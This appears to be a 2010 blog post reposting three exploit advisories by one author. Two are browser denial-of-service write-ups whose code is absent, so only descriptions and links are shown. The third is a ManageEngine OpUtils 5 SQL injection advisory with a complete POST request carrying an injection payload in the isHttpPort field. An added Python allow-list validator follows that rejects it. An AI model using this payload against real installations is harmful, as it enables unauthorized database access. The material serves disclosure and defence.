Thursday, February 18, 2010

Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit

http://www.exploit-db.com/exploits/11438
http://seclists.org/fulldisclosure/2010/Feb/281


For the code, visit the links above, as Blogger does not allow scripts.



=======================================================================

Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit
=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company aksitservices

# Credit by Asheesh Anaconda


#Download http://www.microsoft.com/windows/internet-explorer/worldwide-sites.aspx
#Greets to Bhudeo Prasad for making shell script :)


#Background

Internet Explorer 8 is a popular internet browser, with lots of bugs .....:)

#Vulnerability
This bug is a typical result of a multitudinous loop.
The flaw exists within the "history go" ActiveX control, which contains
stack-based overflow conditions. User interaction is required to
exploit this vulnerability, in that the target must visit a malicious
web page.


#Impact

An attacker can run any Windows command, consume lots of memory, and crash your IE or make
your system inaccessible; your work, if any, might be lost.

#Proof of concept
Copy the code into a text file, save it as "asheesh.html", and open it in Internet Explorer 8.

========================================================================================================================

asheesh.html
========================================================================================================================

asheesh kumar mani tripathi









========================================================================================================================




#If you have any questions, comments, or concerns, feel free to contact me.






Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit


http://www.exploit-db.com/exploits/11432
http://seclists.org/fulldisclosure/2010/Feb/280

=======================================================================

Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company aksitservices

# Credit by Asheesh Anaconda


#Download www.mozilla.com/firefox


#Background

Mozilla Firefox is a popular internet browser. .....:)

#Vulnerability
This bug is a typical result of a multitudinous loop.
The flaw exists when the attacker puts the window.printer() function
in a multitudinous loop. User interaction is required to
exploit this vulnerability, in that the target must visit a malicious
web page.


#Impact
The browser no longer responds to any user input, all tabs are no
longer accessible, and your work, if any, might be lost.



#Proof of concept
Copy the code into a text file, save it as "asheesh.html", and open it in Mozilla Firefox.

========================================================================================================================

asheesh.html
========================================================================================================================


asheesh kumar mani tripathi





========================================================================================================================


#If you have any questions, comments, or concerns, feel free to contact me.

ManageEngine OpUtils 'Login.do' SQL Injection Vulnerability


http://www.securityfocus.com/bid/38082/info
www.packetstormsecurity.org/1002-exploits/oputils_5-sql.txt

================================================================================

ManageEngine OpUtils 5 "Login.DO" SQL Injection Vulnerability
================================================================================

#Date-3/2/10
# code by Asheesh kumar Mani Tripathi

# AKS IT Services

# Credit by Asheesh Anaconda


#Download http://www.manageengine.com/products/oputils

#Vulnerability
ManageEngine OpUtils 5 is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.


========================================================================================================================

Request
========================================================================================================================

POST /Login.do HTTP/1.1
Host: localhost:7080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://localhost:7080/Login.do
Cookie: JSESSIONID=738A4E8130CBE2A0D5E857D9EBF9820E; 32=temp; 83=temp
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

cookieexists=true&username=asheesh&password=asheesh&logonsubmit=+&log=WARNING&locationUrl=localhost&isHttpPort=false"+and+31337-31337="0
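
A server-side allow-list check for the form fields in the request above, as an added example that is not part of the original advisory or of ManageEngine's code. The per-field patterns and the function name are assumptions for illustration; the first sample body is the one from the request, the second is constructed.

```python
import re
from urllib.parse import parse_qsl

# Hypothetical allow-list for the form fields seen in the Login.do request.
# The patterns are assumptions for illustration, not OpUtils' real rules.
FIELD_RULES = {
    "cookieexists": re.compile(r"true|false"),
    "username": re.compile(r"[A-Za-z0-9_.@-]{1,64}"),
    "password": re.compile(r"[^\x00-\x1f]{1,128}"),
    "logonsubmit": re.compile(r"\s?"),
    "log": re.compile(r"[A-Z]{1,16}"),
    "locationUrl": re.compile(r"[A-Za-z0-9.-]{1,253}"),
    "isHttpPort": re.compile(r"true|false"),
}

# Request body copied from the advisory above.
ADVISORY_BODY = ('cookieexists=true&username=asheesh&password=asheesh'
                 '&logonsubmit=+&log=WARNING&locationUrl=localhost'
                 '&isHttpPort=false"+and+31337-31337="0')
# Constructed sample of a normal login submission.
BENIGN_BODY = ('cookieexists=true&username=asheesh&password=asheesh'
               '&logonsubmit=+&log=WARNING&locationUrl=localhost'
               '&isHttpPort=false')


def validate_login_form(body):
    """Return {field: reason} for every field that fails the allow-list."""
    problems, seen = {}, set()
    for name, value in parse_qsl(body, keep_blank_values=True):
        rule = FIELD_RULES.get(name)
        if rule is None:
            problems[name] = "unexpected field"
        elif name in seen:
            problems[name] = "duplicate field"
        elif not rule.fullmatch(value):
            problems[name] = "rejected value %r" % value
        seen.add(name)
    for name in FIELD_RULES.keys() - seen:
        problems[name] = "missing field"
    return problems


if __name__ == "__main__":
    for label, body in (("advisory", ADVISORY_BODY), ("benign", BENIGN_BODY)):
        print(label, validate_login_form(body) or "accepted")
```

Validation of this kind only narrows what reaches the data layer; the query itself should still bind every value as a parameter rather than concatenating it into the SQL string.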



========================================================================================================================
Response
========================================================================================================================


HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 03 Feb 2010 15:24:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 20583